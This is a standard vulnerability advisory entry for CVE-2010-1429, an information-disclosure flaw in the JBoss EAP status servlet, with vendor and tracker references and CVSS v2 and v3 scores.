CVE-2010-1429

high

Description

Red Hat JBoss Enterprise Application Platform (aka JBoss EAP or JBEAP) 4.2 before 4.2.0.CP09 and 4.3 before 4.3.0.CP08 allows remote attackers to obtain sensitive information about "deployed web contexts" via a request to the status servlet, as demonstrated by a full=true query string. NOTE: this issue exists because of a CVE-2008-3273 regression.

References

https://www.exploit-db.com/exploits/44009/

https://rhn.redhat.com/errata/RHSA-2010-0379.html

https://rhn.redhat.com/errata/RHSA-2010-0378.html

https://rhn.redhat.com/errata/RHSA-2010-0377.html

https://rhn.redhat.com/errata/RHSA-2010-0376.html

https://exchange.xforce.ibmcloud.com/vulnerabilities/58149

https://bugzilla.redhat.com/show_bug.cgi?id=585900

http://www.vupen.com/english/advisories/2010/0992

http://www.securityfocus.com/bid/39710

http://securitytracker.com/id?1023918

http://secunia.com/advisories/39563

http://marc.info/?l=bugtraq&m=132698550418872&w=2

Details

Source: Mitre, NVD

Published: 2010-04-28

Risk Information

CVSS v2

Base Score: 5

Vector: CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N

Severity: Medium

CVSS v3

Base Score: 7.5

Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Severity: High